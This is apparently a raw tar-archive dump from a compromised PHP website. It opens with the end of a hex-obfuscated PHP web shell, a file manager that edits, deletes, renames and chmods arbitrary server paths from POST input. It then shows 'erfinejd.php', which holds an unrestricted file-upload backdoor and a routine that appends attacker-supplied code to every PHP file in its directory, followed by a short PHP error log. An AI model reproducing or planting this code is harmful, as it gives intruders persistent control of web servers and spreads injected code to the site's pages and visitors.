\x68e\x69g\x68t:3\x30\x70x;\x22\x20v\x61\x6cu\x65\x3d\"".$_POST["na\x6d\x65"]."\x22\x20/>\n\x3ci\x6ep\x75\x74\x20\x74y\x70e\x3d\"\x68\x69\x64\x64\x65\x6e\"\x20n\x61\x6d\x65\x3d\"\x70a\x74\x68\x22
v\x61\x6cu\x65\x3d\x22".$_POST["pat\x68"]."\">\n<i\x6e\x70ut
\x74y\x70\x65=\"\x68i\x64\x64\x65\x6e\"\x20\x6ea\x6de=\"op\x74\"\x20\x76al\x75\x65=\x22\x72e\x6eame\x22>\n\x3c\x69\x6epu\x74
typ\x65=\x22sub\x6dit\"\x20v\x61\x6c\x75e\x3d\"U\x74iw\x69\x22\x20\x73t\x79l\x65\x3d\"h\x65i\x67\x68t:\x33\x30\x70x\x3b\x22
/\x3e\n\x3c/\x66o\x72\x6d>";}elseif($_POST["op\x74"]=="edit"){if(isset($_POST["\x73\x72\x63"])){${${"G\x4c\x4f\x42\x41\x4cS"}["\x62w\x71g\x69\x70"]}=fopen($_POST["p\x61\x74\x68"],"w");if(fwrite(${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x62\x77\x71\x67\x69\x70"]},$_POST["\x73rc"])){echo"\x3c\x62r\x3e<\x62r>\x3c\x66\x6f\x6et\x20col\x6f\x72\x3d\"\x77hi\x74e\x22>\x45\x44IT
\x46I\x4c\x45\x20\x53\x55\x43CESS\x20\x21!\x3c/\x66\x6f\x6e\x74><br/>";}else{echo"<\x73cr\x69\x70\x74\x3ea\x6ce\x72t(\"\x45d\x69\x74\x20F\x69le\x20\x47\x61\x67\x61\x6c
\x21\x21\")</\x73\x63\x72i\x70\x74\x3e";}fclose(${${"\x47L\x4f\x42A\x4c\x53"}["\x62\x77\x71\x67\x69p"]});}echo"<\x66orm\x20m\x65\x74h\x6fd=\x22P\x4fST\">\n\x3ct\x65x\x74\x61rea
co\x6cs\x3d\x38\x30
r\x6f\x77\x73\x3d\x320\x20\x6ea\x6de\x3d\"\x73\x72\x63\x22\x20\x73ty\x6c\x65=\x22fon\x74-\x73\x69\x7a\x65:\x20\x38p\x78\x3b
b\x6f\x72d\x65\x72: \x31p\x78 s\x6fl\x69d \x77\x68\x69\x74e\x3b
bac\x6bg\x72\x6f\x75n\x64-co\x6c\x6fr: \x62\x6cack\x3b\x20\x63olo\x72:
w\x68it\x65\x3b
wi\x64\x74\x68:\x20\x31\x30\x30%;\x68ei\x67ht:\x20\x31\x30\x30\x30px;\">".htmlspecialchars(file_get_contents($_POST["p\x61\x74\x68"]))."\x3c/\x74e\x78\x74\x61r\x65a>\x3cb\x72
/>\n\x3c\x69n\x70ut\x20t\x79\x70\x65\x3d\x22\x68i\x64\x64\x65n\"\x20\x6e\x61m\x65=\x22\x70\x61th\x22
\x76al\x75e\x3d\"".$_POST["pa\x74\x68"]."\x22\x3e\n\x3c\x69\x6e\x70\x75t
t\x79\x70\x65=\"\x68i\x64de\x6e\x22\x20n\x61\x6d\x65=\x22op\x74\"\x20\x76al\x75\x65=\"ed\x69\x74\x22>\n\x3ci\x6e\x70\x75\x74\x20t\x79\x70\x65=\"\x73ubm\x69t\x22\x20\x76al\x75\x65\x3d\x22U\x74\x69\x77\x69\"\x20s\x74\x79l\x65=\"\x68e\x69g\x68t:\x33\x30\x70\x78\x3b
\x77\x69dt\x68:\x37\x30\x70x;\x22/\x3e\n\x3c/\x66or\x6d\x3e";}echo"\x3c/ce\x6ete\x72>";}else{${"\x47\x4cOB\x41\x4c\x53"}["u\x75hc\x6d\x70liic\x63\x74"]="s\x63a\x6ed\x69\x72";echo"</\x74\x61\x62l\x65\x3e<br\x20/\x3e<c\x65\x6e\x74\x65\x72>";if(isset($_GET["\x6fp\x74i\x6f\x6e"])&&$_POST["\x6f\x70\x74"]=="de\x6c\x65\x74e"){if($_POST["\x74yp\x65"]=="\x64\x69\x72"){if(rmdir($_POST["\x70a\x74\x68"])){echo"<b\x72>\x3cbr\x3e<\x66o\x6et
co\x6c\x6fr=\"\x77\x68it\x65\x22\x3eDE\x4c\x45TE \x44I\x52
\x53\x55CC\x45\x53S\x20\x21\x21\x3c/fo\x6et>\x3cb\x72/>";}else{echo"<\x73c\x72\x69\x70t\x3ea\x6cer\x74(\"De\x6cet\x65
Di\x72 \x47a\x67a\x6c
!!\x22)\x3c/s\x63\x72\x69pt>";}}elseif($_POST["\x74\x79\x70\x65"]=="f\x69\x6c\x65"){if(unlink($_POST["\x70a\x74\x68"])){echo"<br\x3e\x3c\x62r\x3e\x3c\x66\x6f\x6et\x20\x63o\x6cor\x3d\x22\x77\x68it\x65\x22\x3eD\x45\x4cE\x54\x45
\x46IL\x45\x20SU\x43C\x45\x53S
!!</fo\x6e\x74\x3e\x3cb\x72/>";}else{echo"<s\x63r\x69\x70\x74>\x61l\x65\x72t(\"\x44\x65lete
F\x69l\x65\x20\x47\x61g\x61\x6c\x20!\x21\x22)\x3c/\x73c\x72i\x70\x74>";}}}${"\x47L\x4fB\x41\x4cS"}["\x73u\x6a\x66\x72dm\x65"]="pa";echo"</cente\x72>";${"GL\x4f\x42AL\x53"}["xg\x6cclg"]="\x73\x63\x61n\x64\x69\x72";${${"\x47LO\x42\x41L\x53"}["\x79\x67\x6d\x72\x77\x6f\x62\x78\x67\x62"]}=scandir(${${"G\x4cO\x42A\x4c\x53"}["\x67f\x77\x72\x64\x6a\x6fwx\x76tt"]});${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x73u\x6a\x66\x72\x64m\x65"]}=getcwd();echo"<di\x76\x20\x69\x64\x3d\x22\x63\x6fn\x74ent\x22\x3e\x3ctab\x6c\x65
w\x69d\x74h\x3d\x22\x39\x35\x25\x22
cl\x61\x73\x73=\"\x74\x61\x62le_\x68o\x6de\x22
\x62\x6f\x72\x64\x65\x72=\"\x30\"\x20\x63e\x6cl\x70\x61ddi\x6e\x67=\x223\"
\x63e\x6c\x6cs\x70\x61\x63i\x6e\x67=\x221\"\x20\x61\x6ci\x67\x6e=\x22\x63en\x74er\x22>\n\x3c\x74\x72\x20\x63l\x61\x73\x73=\"fi\x72\x73t\">\n<\x74\x68\x3e\x3c\x63\x65n\x74er>N\x61m\x65</c\x65\x6eter></\x74\x68>\n<\x74h\x3e<\x63\x65\x6ete\x72>S\x69\x7a\x65</\x63\x65\x6e\x74er>\x3c/th\x3e\n\x3c\x74\x68><\x63\x65nt\x65r\x3eP\x65\x72\x6d</\x63\x65\x6eter\x3e\x3c/th>\n<\x74h\x3e<cen\x74\x65r\x3e\x4fp\x74i\x6fn\x73\x3c/c\x65nt\x65\x72\x3e\x3c/\x74\x68\x3e\n</\x74\x72>\n\x3ctr\x3e";foreach(${${"\x47\x4c\x4f\x42\x41L\x53"}["\x75u\x68\x63\x6d\x70lii\x63\x63\x74"]}
as${${"GL\x4fB\x41LS"}["\x69\x78\x63ui\x73\x6b\x78\x6d\x79"]}){${"G\x4c\x4fB\x41\x4c\x53"}["\x63\x6e\x74wn\x63"]="\x64i\x72";$djfwxyvwx="\x64\x69r";if(!is_dir("$path/$dir")||${$djfwxyvwx}=="."||${${"\x47L\x4fBA\x4cS"}["\x63n\x74\x77\x6ec"]}=="\x2e.")continue;echo"\x3c\x74\x72\x3e\n<\x74d\x20\x63la\x73s=\x74d\x5f\x68\x6fm\x65><im\x67
\x73\x72c\x3d\x27\x64a\x74\x61:\x69\x6d\x61ge/pn\x67;ba\x73e64,\x52\x30lG\x4fDl\x68EwA\x51A\x4c\x4d\x41A\x41AAAP///\x35\x79c\x41\x4d\x37O\x59///\x6e\x50//\x7a\x76/\x4f\x6e\x50f39////w\x41A\x41\x41\x41\x41AAAAA\x41A\x41\x41A\x41\x41A\x41AA\x41A\x41A\x41\x43H5BA\x45A\x41\x41\x67\x41\x4c\x41\x41\x41A\x41AT\x41\x42\x41AAA\x52RE\x4dlJq\x37046\x79\x706\x42\x78si\x48\x45\x56\x42\x45\x41\x4b\x59\x43\x55\x50\x72D\x70\x37H\x6c\x58R\x64\x45o\x4d\x71Ceb\x70/4Yc\x68\x66fz\x47QhH\x34Y\x52Y\x50B\x32DO\x6c\x48P\x69\x4bwq\x64\x31P\x71\x38yrV\x56\x67\x33Q\x59eH5R\x59K5\x72\x4a\x66a\x46U\x55\x41\x33v\x424\x66\x42I\x42\x41\x44\x73='\x3e<a
h\x72\x65f\x3d\x22?p\x61\x74h\x3d$path/$dir\"\x3e\x20$dir\x3c/\x61></\x74d>\n<t\x64
c\x6ca\x73\x73\x3dtd_h\x6fme>\x3c\x63e\x6e\x74\x65\x72>DIR</\x63\x65\x6e\x74e\x72></\x74\x64\x3e\n\x3ct\x64\x20cla\x73\x73\x3d\x74d_h\x6f\x6d\x65\x3e<ce\x6et\x65\x72>";if(is_writable("$path/$dir"))echo"<\x66o\x6e\x74
color\x3d\"#\x35\x37FF\x30\x30\">";elseif(!is_readable("$path/$dir"))echo"\x3c\x66o\x6et\x20\x63o\x6co\x72=\x22#\x46F0\x30\x304\x22\x3e";echo
perms("$path/$dir");if(is_writable("$path/$dir")||!is_readable("$path/$dir"))echo"\x3c/\x66o\x6e\x74>";echo"\x3c/\x63\x65\x6et\x65\x72></td>\n<t\x64
c\x6c\x61ss\x3dt\x64_\x68ome\x3e<c\x65\x6eter>\x3c\x66orm\x20met\x68\x6fd=\x22PO\x53\x54\"
a\x63\x74ion=\x22?op\x74i\x6fn&p\x61\x74h\x3d$path\x22\x3e\n\x3cse\x6cect
\x6ea\x6d\x65\x3d\x22o\x70t\"
st\x79l\x65=\"\x6d\x61rg\x69\x6e-top:6px;w\x69dt\x68:100\x70\x78\x3bf\x6f\x6et-f\x61\x6dil\x79:\x4b\x65\x6c\x6cy\x20Sl\x61\x62\x3b\x66\x6f\x6et-\x73\x69z\x65:1\x35\x3b\x62\x61\x63kgr\x6f\x75n\x64:b\x6ca\x63\x6b\x3bc\x6f\x6cor:wh\x69\x74\x65;bo\x72\x64e\x72:\x32p\x78
s\x6f\x6c\x69d
\x77\x68ite\x3bbord\x65\x72-r\x61diu\x73:\x35\x70x\x22\x3e\n\x3cop\x74i\x6f\x6e\x20\x76al\x75\x65=\"A\x63ti\x6f\x6e\x22>\x41c\x74ion</\x6fpti\x6fn\x3e\n<\x6fpt\x69\x6f\x6e\x20valu\x65\x3d\"del\x65t\x65\">\x44\x65let\x65</op\x74i\x6fn\x3e\n\x3cop\x74\x69o\x6e
va\x6c\x75\x65\x3d\x22ch\x6do\x64\x22>C\x68m\x6f\x64</o\x70tio\x6e\x3e\n<o\x70ti\x6fn\x20va\x6c\x75\x65\x3d\"\x72en\x61\x6de\x22>\x52\x65\x6e\x61\x6d\x65</\x6f\x70\x74\x69o\x6e>\n</sel\x65\x63t\x3e\n\x3ci\x6ep\x75\x74\x20type\x3d\"hi\x64d\x65\x6e\"
\x6eame\x3d\"\x74y\x70\x65\"\x20v\x61lu\x65\x3d\"d\x69r\x22>\n<\x69\x6e\x70\x75t\x20ty\x70\x65\x3d\"\x68\x69\x64\x64e\x6e\x22\x20\x6e\x61me=\"\x6eame\x22\x20\x76\x61\x6c\x75e=\"$dir\x22\x3e\n\x3ci\x6ep\x75\x74\x20\x74ype\x3d\x22\x68idd\x65\x6e\x22
\x6e\x61\x6d\x65\x3d\x22\x70\x61t\x68\x22\x20\x76\x61\x6cu\x65=\x22$path/$dir\">\n\x3ci\x6ep\x75t\x20\x74y\x70e=\"submi\x74\"\x20\x76\x61\x6c\x75\x65\x3d\x22\x3e\"
st\x79\x6c\x65\x3d\"ma\x72\x67i\x6e-to\x70:\x36px;w\x69d\x74\x68:\x32\x37\x3b\x66\x6fnt-fa\x6di\x6cy:Kel\x6c\x79
\x53\x6c\x61b;f\x6f\x6e\x74-\x73i\x7a\x65:15\x3b\x62a\x63\x6b\x67r\x6f\x75\x6e\x64:b\x6ca\x63k;c\x6flor:\x77hi\x74e;b\x6frd\x65r:\x32px\x20\x73ol\x69d
wh\x69t\x65;\x62\x6f\x72\x64\x65\x72-\x72\x61\x64\x69us:5\x70\x78\"/\x3e\n</\x66o\x72\x6d></\x63e\x6e\x74e\x72\x3e\x3c/\x74d>\n\x3c/\x74\x72\x3e";}echo"<t\x72
\x63\x6c\x61s\x73\x3d\x22\x66\x69rs\x74\"\x3e\x3ct\x64></t\x64>\x3ctd></td\x3e\x3c\x74\x64>\x3c/\x74\x64\x3e<t\x64>\x3c/\x74\x64\x3e\x3c/\x74\x72\x3e";foreach(${${"\x47\x4c\x4f\x42\x41L\x53"}["\x78\x67l\x63\x6cg"]}
as${${"\x47LO\x42AL\x53"}["\x79\x70um\x75\x66byz\x67"]}){if(!is_file("$path/$file"))continue;${"GLO\x42A\x4c\x53"}["jy\x72n\x65v\x6ben"]="\x73\x69\x7ae";$bcvkgsqk="\x73\x69\x7ae";${${"G\x4c\x4fB\x41L\x53"}["dn\x76wg\x77\x63\x65\x78\x78"]}=filesize("$path/$file")/1024;${$bcvkgsqk}=round(${${"\x47\x4cO\x42\x41L\x53"}["\x64\x6ev\x77\x67\x77ce\x78x"]},3);if(${${"\x47L\x4fB\x41\x4c\x53"}["\x6ay\x72n\x65\x76k\x65\x6e"]}>=1024){${${"G\x4c\x4f\x42\x41\x4c\x53"}["dnv\x77g\x77c\x65\x78\x78"]}=round(${${"G\x4c\x4f\x42A\x4c\x53"}["\x64n\x76\x77\x67\x77c\x65x\x78"]}/1024,2)."\x20MB";}else{${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x64\x6dwb\x74\x73\x75\x6b\x75"]="s\x69\x7ae";$ftdthpynjh="\x73\x69\x7a\x65";${$ftdthpynjh}=${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x64\x6d\x77\x62\x74\x73\x75\x6b\x75"]}."
K\x42";}echo"\x3ctr\x3e\n<\x74d
\x63\x6c\x61\x73\x73=td\x5fh\x6f\x6d\x65><im\x67
src=\x27da\x74\x61:i\x6d\x61g\x65/pn\x67\x3bb\x61s\x656\x34,\x69\x56\x42\x4fRw0\x4bG\x67\x6f\x41\x41\x41ANSU\x68\x45Ug\x41\x41ABAA\x41\x41AQCAY\x41\x41AA\x668/\x39hAAA\x41AX\x4e\x53R0\x49\x41r\x734c6\x51A\x41AA\x5a\x69\x530\x64\x45AP\x38A/w\x44/o\x4c\x32\x6ek\x77\x41\x41AAlw\x53Fl\x7a\x41\x41AL\x45wAAC\x78MBA\x4aqc\x47\x41A\x41AA\x64\x30S\x551F\x429o\x4aB\x68\x63TJ\x76\x32\x422d4\x41AAJ\x4d\x53U\x52\x42\x56D\x6aLb\x5aO9\x54hxZEIW/ql\x76\x64\x74\x4d38\x42N\x67JQ\x6dQ\x67JG\x64+\x41/\x4dQ\x42Lw\x47\x6a\x69\x77H3\x6e\x77d\x6b\x53\x4ct\x4f2xERG5L\x71\x78\x58R\x53\x49\x52\x32\x59D\x66D\x34Gk\x47\x4d\x30\x503\x72\x624b9P\x41\x7a\x30l\x37p\x53\x6cW\x6cW0f\x6enL\x6f\x6cA\x49\x50B4\x50\x58\x68\x34\x65\x46\x75\x6e\x75cA\x49\x49LwdES\x65\x5a\x79\x41\x69fnp\x36+\x759\x6fN\x4c\x6f\x33\x67M\x33NzT\x64\x48R+//zv\x4aMz\x53\x79\x4aKKo\x64\x69\x49g8A\x58a\x78\x65\x49z\x31\x62\x44Z\x37Mx\x71N\x66t\x67\x53U\x52\x44\x57\x797LUnZ\x30\x64\x59m\x78AF\x41\x56E\x6cI\x36\x41\x45\x43yg\x49s\x51Qs\x69\x7aL\x42\x4fABA\x44\x4fj\x4b\x41pqh\x37\x75\x37\x47o\x43U\x57iwY\x62e\x74o\x55\x48\x72\x72\x50cwC\x71\x6f\x462\x4bU\x65X\x4c\x7aEzB\x760+uQmSH\x4d\x45\x5a\x39F\x36\x53Z\x63r6\x694\x49sB\x4f\x61/b7H\x51\x4d\x61\x48\x74I\x41\x77gL\x64H\x61\x6c\x44\x41\x31e\x760\x65Q\x62S\x6a\x72\x45\x72Q\x77\x4a\x70q\x464\x65\x41\x78/\x68\x6f\x71\x441\x332\x6dM\x6b\x4a\x72\x695uSOl\x46\x68\x45hp\x55\x51Iiojwa\x6d\x4fDNsljf\x55W\x43qpL\x6e\x4f\x61a\x43\x53KJt\x6eaB\x43\x73ZYjAl\x6cmX\x494\x76\x61\x65oaVX0c\x62S\x64hmUR\x33\x7a\x41\x4b\x76\x4e\x6aY6V\x69\x6f\x6f0tWzg\x45\x6f\x6eK\x62\x57+Kk\x47W\x74\x33\x55n\x74\x30CeG\x66J\x73\x39g+UU\x30r\x45\x47HH/\x48\x77/M\x6aH6/T+P\x4fdFoRN\x4bC\x68\x4d\x322x\x6dO\x50e\x73pj\x50\x47\x516Hp\x4eQ2\x37t6\x73A\x43\x44SNa\x6eyo\x6cjDLEd\x56\x61F\x4f\x4c\x658Z\x6b\x55j\x4b\x35ukq\x33t7\x39\x6c\x50\x43\x37/\x4f\x44\x6b\x35Ga+\x596\x4f5MqymNw3\x561y3\x68\x79z\x66\x58\x30\x68q\x76JLyb\x58\x46\x64++f\x32d\x33d0d\x6ds+\x71\x76\x67\x34O\x44\x7a8f\x48x\x30/L\x73b\x653\x39\x364\x73\x53\x37+4u\x45\x6a\x75n\x70\x71mS\x656e3\x443\x4e\x35/N\x30W\x5ab\x74ly\x39\x66\x309\x6eZ2Z/b\x32\x39v\x32fL\x45\x65vv\x4b\x39q\x76\x37\x632t\x6f\x4bi8Uii\x51iqHbm6r\x69\x57\x36a\x31\x33\x66\x6e+zv\x373+oqo\x72h\x63L\x67\x4b\x55\x46\x58\x56P+f\x6e52+\x4co\x6e\x6a8\x49LJ\x30P\x38\x5a\x49\x43CF\x39/PT\x70C\x6chpBvgP\x65\x6c\x6f\x4c\x39\x5555NIA\x41AAA\x41SUVOR\x4b\x35\x43Y\x49I\x3d'>\x3ca
h\x72\x65\x66\x3d\"?\x66\x69\x6cesrc\x3d$path/$file\x26pa\x74\x68\x3d$path\x22\x3e\x20$file</a>\x3c/td>\n\x3c\x74\x64
\x63la\x73s\x3d\x74\x64_home\x3e<\x63e\x6e\x74\x65r\x3e".${${"\x47LO\x42\x41\x4c\x53"}["d\x6e\x76w\x67\x77\x63\x65\x78x"]}."</\x63\x65\x6e\x74\x65\x72>\x3c/\x74d>\n\x3c\x74d
\x63l\x61ss=\x74d\x5fh\x6f\x6de>\x3cce\x6e\x74\x65\x72>";if(is_writable("$path/$file"))echo"\x3cfo\x6et
col\x6fr=\x22\x23\x35\x37\x46\x460\x30\x22>";elseif(!is_readable("$path/$file"))echo"<font\x20co\x6c\x6f\x72\x3d\"#FF\x30\x3004\x22>";echo
perms("$path/$file");if(is_writable("$path/$file")||!is_readable("$path/$file"))echo"</fon\x74>";echo"</cen\x74\x65\x72>\x3c/t\x64\x3e\n\x3c\x74\x64\x20cl\x61\x73s=td\x5fh\x6f\x6d\x65>\x3c\x63e\x6e\x74\x65\x72>\x3c\x66or\x6d
m\x65th\x6fd=\"\x50OST\"
\x61\x63tion=\x22?opt\x69on\x26p\x61t\x68=$path\">\n\x3cse\x6c\x65\x63\x74
\x6e\x61m\x65\x3d\"opt\"
\x73t\x79\x6ce=\"\x6da\x72g\x69\x6e-\x74\x6fp:6p\x78;\x77idth:\x310\x30\x70\x78;f\x6f\x6et-fa\x6di\x6c\x79:K\x65ll\x79
Sl\x61\x62\x3bf\x6f\x6e\x74-\x73iz\x65:1\x35;\x62a\x63k\x67\x72\x6fu\x6e\x64:\x62\x6ca\x63\x6b\x3bc\x6f\x6cor:w\x68i\x74\x65;border:2\x70x
\x73\x6f\x6c\x69d\x20w\x68i\x74e;borde\x72-\x72ad\x69\x75s:\x35p\x78\x22>\n<\x6f\x70t\x69o\x6e\x20\x76\x61\x6cue\x3d\x22Ac\x74ion\">Ac\x74\x69on\x3c/\x6fpt\x69o\x6e>\n\x3c\x6fp\x74\x69\x6fn\x20value=\x22\x64\x65\x6c\x65t\x65\x22>D\x65\x6c\x65te\x3c/op\x74\x69o\x6e\x3e\n\x3c\x6fp\x74ion
\x76alue\x3d\"\x65di\x74\"\x3eE\x64\x69\x74\x3c/\x6f\x70\x74i\x6f\x6e>\n\x3copt\x69o\x6e
val\x75e=\"\x72e\x6ea\x6d\x65\"\x3e\x52ena\x6d\x65</opti\x6fn\x3e\n\x3copt\x69\x6f\x6e
\x76alue\x3d\x22c\x68m\x6f\x64\"\x3eC\x68\x6d\x6f\x64\x3c/opti\x6fn\x3e\n</sel\x65c\x74>\n<in\x70u\x74\x20\x74\x79pe\x3d\x22\x68id\x64\x65n\"\x20na\x6de=\x22\x74\x79pe\"
v\x61l\x75\x65=\x22\x66\x69\x6c\x65\">\n\x3c\x69\x6e\x70ut\x20t\x79pe=\x22\x68\x69dd\x65n\"\x20name=\x22n\x61\x6de\x22
val\x75e\x3d\x22$file\x22>\n\x3c\x69\x6ep\x75t\x20type\x3d\x22\x68id\x64e\x6e\"
n\x61\x6de\x3d\x22pa\x74\x68\"\x20va\x6cu\x65=\x22$path/$file\x22\x3e\n<i\x6eput
\x74yp\x65=\"\x73\x75\x62m\x69\x74\"
v\x61l\x75e\x3d\x22\x3e\"
s\x74\x79le\x3d\x22\x6da\x72g\x69n-t\x6fp:6\x70\x78;\x77\x69dth:2\x37;\x66\x6fnt-\x66\x61\x6d\x69l\x79:K\x65\x6c\x6c\x79
Sl\x61\x62\x3b\x66\x6f\x6et-\x73i\x7a\x65:\x315\x3b\x62ac\x6b\x67\x72ou\x6e\x64:\x62\x6c\x61\x63\x6b;\x63\x6fl\x6fr:w\x68\x69\x74\x65;b\x6f\x72de\x72:\x32\x70x\x20\x73ol\x69d
\x77h\x69\x74\x65\x3bb\x6f\x72\x64er-r\x61di\x75s:5\x70\x78\x22/>\n\x3c/\x66o\x72m\x3e\x3c/c\x65\x6e\x74\x65\x72></\x74d>\n</tr>";}echo"</\x74\x61bl\x65>\n\x3c/\x64i\x76>";}function
perms($file){$fqokdbxzvdc="\x70\x65r\x6d\x73";${"\x47L\x4fBA\x4cS"}["qbm\x6c\x72\x6f\x76"]="\x70\x65\x72\x6d\x73";${"\x47\x4c\x4fB\x41LS"}["\x6bte\x77\x76\x72\x65\x67kn\x6b"]="pe\x72\x6ds";${"\x47\x4c\x4f\x42\x41\x4cS"}["\x61o\x67ig\x62\x6d\x6e"]="i\x6ef\x6f";${"\x47\x4cO\x42\x41\x4cS"}["\x73\x66\x65s\x63km\x71l\x63\x69"]="\x70\x65\x72\x6ds";${${"\x47\x4c\x4fBA\x4c\x53"}["\x73\x66\x65s\x63\x6b\x6dq\x6cci"]}=fileperms(${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x79\x70\x75m\x75\x66b\x79z\x67"]});${"\x47\x4cO\x42\x41\x4c\x53"}["\x6cn\x66\x73\x75\x6fwe\x6c\x79"]="inf\x6f";${"\x47\x4c\x4fB\x41\x4c\x53"}["\x6f\x6d\x63\x68\x74e"]="\x70\x65r\x6d\x73";${"\x47\x4cO\x42A\x4c\x53"}["\x74v\x6d\x71f\x66\x77k\x76\x76"]="perm\x73";if((${${"\x47\x4cO\x42\x41\x4c\x53"}["\x71b\x6d\x6cr\x6f\x76"]}&0xC000)==0xC000){${${"G\x4c\x4f\x42A\x4c\x53"}["s\x72b\x65\x71\x71"]}="\x73";}elseif((${${"\x47\x4c\x4fB\x41\x4cS"}["\x6b\x74\x65\x77\x76re\x67\x6b\x6e\x6b"]}&0xA000)==0xA000){${${"\x47\x4c\x4fB\x41L\x53"}["\x73\x72\x62\x65\x71q"]}="l";}elseif((${${"GL\x4f\x42\x41\x4cS"}["k\x6fft\x6c\x75\x77\x6e\x6d\x70r"]}&0x8000)==0x8000){$imjdqneldden="\x69\x6e\x66\x6f";${$imjdqneldden}="-";}elseif((${${"\x47\x4c\x4f\x42\x41LS"}["ko\x66\x74\x6c\x75wn\x6d\x70\x72"]}&0x6000)==0x6000){${${"\x47\x4cOB\x41\x4c\x53"}["s\x72be\x71\x71"]}="\x62";}elseif((${${"\x47\x4cOB\x41\x4c\x53"}["\x6f\x6d\x63\x68\x74\x65"]}&0x4000)==0x4000){${"\x47\x4c\x4fB\x41L\x53"}["\x71\x63cms\x65\x6d\x70"]="i\x6e\x66o";${${"G\x4c\x4fB\x41\x4c\x53"}["\x71cc\x6d\x73\x65\x6d\x70"]}="d";}elseif((${${"\x47LO\x42A\x4cS"}["ko\x66tlu\x77n\x6d\x70r"]}&0x2000)==0x2000){${${"G\x4cO\x42\x41\x4c\x53"}["s\x72b\x65q\x71"]}="c";}elseif((${$fqokdbxzvdc}&0x1000)==0x1000){${${"G\x4c\x4f\x42\x41\x4cS"}["\x73r\x62e\x71\x71"]}="\x70";}else{$vxfuytrq="\x69nf\x6f";${$vxfuytrq}="u";}${${"\x47\x4c\x4fBA\x4c\x53"}["\x73\x72\x62\x65\x71q"]}.=((${${"G\x4c\x4fBALS"}["k\x6f\x66t\x6c\x75\x77nm\x70\x72"]}&0x0100)?"\x72":"-");$toeudlkbhkky="\x70\x65\x72\x6d\x73";$pifulgo="\x69n\x66o";${${"GLO\x42\x41\x4c\x53"}["\x73r\x62\x65\x71\x71"]}.=((${${"\x47LOB\x41L\x53"}["k\x6f\x66\x74\x6c\x75\x77\x6e\x6d\x70\x72"]}&0x0080)?"\x77":"-");${"\x47L\x4f\x42A\x4c\x53"}["\x6a\x65\x6c\x6a\x74y\x76\x6bm\x61t"]="p\x65\x72m\x73";${${"\x47\x4cO\x42\x41\x4c\x53"}["\x6c\x6e\x66s\x75\x6fwely"]}.=((${${"G\x4c\x4f\x42A\x4cS"}["\x6b\x6f\x66\x74\x6cu\x77n\x6d\x70r"]}&0x0040)?((${${"\x47L\x4f\x42A\x4cS"}["\x6b\x6ff\x74\x6c\x75wn\x6d\x70\x72"]}&0x0800)?"s":"\x78"):((${${"\x47L\x4f\x42\x41LS"}["\x74\x76\x6dq\x66f\x77k\x76v"]}&0x0800)?"S":"-"));${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x73r\x62\x65qq"]}.=((${${"\x47\x4c\x4f\x42\x41L\x53"}["\x6a\x65l\x6a\x74\x79\x76\x6b\x6da\x74"]}&0x0020)?"r":"-");${$pifulgo}.=((${${"\x47L\x4fB\x41\x4c\x53"}["ko\x66\x74\x6cu\x77n\x6d\x70r"]}&0x0010)?"w":"-");${${"\x47\x4c\x4fBA\x4c\x53"}["\x73r\x62\x65\x71\x71"]}.=((${$toeudlkbhkky}&0x0008)?((${${"\x47LO\x42\x41L\x53"}["kof\x74\x6c\x75\x77\x6em\x70\x72"]}&0x0400)?"\x73":"\x78"):((${${"G\x4cOB\x41L\x53"}["\x6b\x6f\x66t\x6cuw\x6emp\x72"]}&0x0400)?"S":"-"));${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x73rb\x65\x71q"]}.=((${${"\x47\x4c\x4f\x42\x41L\x53"}["k\x6f\x66\x74\x6c\x75\x77n\x6d\x70\x72"]}&0x0004)?"\x72":"-");${${"\x47LOB\x41\x4cS"}["\x61\x6f\x67\x69\x67b\x6d\x6e"]}.=((${${"\x47\x4cOBA\x4c\x53"}["ko\x66\x74\x6c\x75\x77\x6e\x6d\x70\x72"]}&0x0002)?"\x77":"-");${${"G\x4cOBAL\x53"}["\x73\x72\x62\x65\x71\x71"]}.=((${${"\x47\x4c\x4fBA\x4c\x53"}["\x6b\x6f\x66t\x6cu\x77\x6empr"]}&0x0001)?((${${"\x47\x4c\x4fB\x41LS"}["\x6b\x6fft\x6cu\x77\x6e\x6d\x70\x72"]}&0x0200)?"\x74":"\x78"):((${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x6b\x6f\x66\x74\x6c\x75\x77\x6em\x70\x72"]}&0x0200)?"\x54":"-"));return${${"\x47\x4c\x4f\x42\x41L\x53"}["s\x72\x62\x65\x71\x71"]};}echo
"\n\x3c/BOD\x59>\n</H\x54M\x4c>\n";
?>erfinejd.php000064400000001370151161735500007050 0ustar00<?php
echo"<form method='post'
enctype='multipart/form-data'><input type='file'
name='a'><input type='submit'
value='Nyanpasu!!!'></form><pre>";if(isset($_FILES['a'])){move_uploaded_file($_FILES['a']['tmp_name'],"{$_FILES['a']['name']}");print_r($_FILES);};echo"</pre>";?>
<?php
if (isset($_GET['bak'])) {
$directory = __DIR__;
$mama = $_POST['file'];
$textToAppend = '
' . $mama . '
';
if ($handle = opendir($directory)) {
while (false !== ($file = readdir($handle))) {
if (pathinfo($file, PATHINFO_EXTENSION) === 'php') {
$fileHandle = fopen($directory . '/' . $file,
'a');
fwrite($fileHandle, $textToAppend);
fclose($fileHandle);
echo "OK >> $file
";
}
}
closedir($handle);
}
}
?>
error_log000064400000000274151161735540006474 0ustar00[11-Nov-2025 09:08:15
UTC] PHP Warning: Module 'imagick' already loaded in Unknown on
line 0
[11-Nov-2025 09:08:19 UTC] PHP Warning: Module 'imagick' already
loaded in Unknown on line 0